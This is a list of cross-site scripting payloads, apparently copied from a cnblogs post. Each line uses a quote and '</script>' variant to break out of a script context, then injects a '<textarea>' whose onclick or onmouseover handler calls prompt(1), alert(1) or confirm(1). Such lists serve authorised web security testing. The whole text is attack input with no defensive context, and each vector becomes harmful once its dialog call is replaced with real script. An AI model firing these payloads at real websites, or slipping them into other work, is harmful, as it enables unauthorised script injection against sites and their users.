'</script><textarea onclick=prompt(1)>//
'></script><textarea onclick=prompt(1)>//
></script><textarea onclick=prompt(1)>//
"</script><textarea onclick=prompt(1)>//
"></script><textarea onclick=prompt(1)>//
</script><textarea onclick=prompt(1)>
</script><textarea onclick=prompt(1)>
</script><textarea onmouseover=alert(1)>//
'</script><textarea onmouseover=alert(1)>//
'></script><textarea onmouseover=alert(1)>//
></script><textarea onmouseover=alert(1)>//
"</script><textarea onmouseover=alert(1)>//
"></script><textarea onmouseover=alert(1)>//
</script><textarea onmouseover=alert(1)>
</script><textarea onmouseover=alert(1)>
</script><textarea onmouseover=confirm(1)>//
'</script><textarea onmouseover=confirm(1)>//
'></script><textarea onmouseover=confirm(1)>//
></script><textarea onmouseover=confirm(1)>//
"</script><textarea onmouseover=confirm(1)>//
"></script><textarea onmouseover=confirm(1)>//
</script><textarea onmouseover=confirm(1)>
</script><textarea onmouseover=confirm(1)>
</script><textarea onmouseover=prompt(1)>//
'</script><textarea onmouseover=prompt(1)>//
'></script><textarea onmouseover=prompt(1)>//
></script><textarea onmouseover=prompt(1)>//
"</script><textarea onmouseover=prompt(1)>//
"></script><textarea onmouseover=prompt(1)>//
</script><textarea onmouseover=prompt(1)>
</script><textarea onmouseover=prompt(1)>

  

原文地址:https://www.cnblogs.com/xiaobaichuangtianxia/p/7337557.html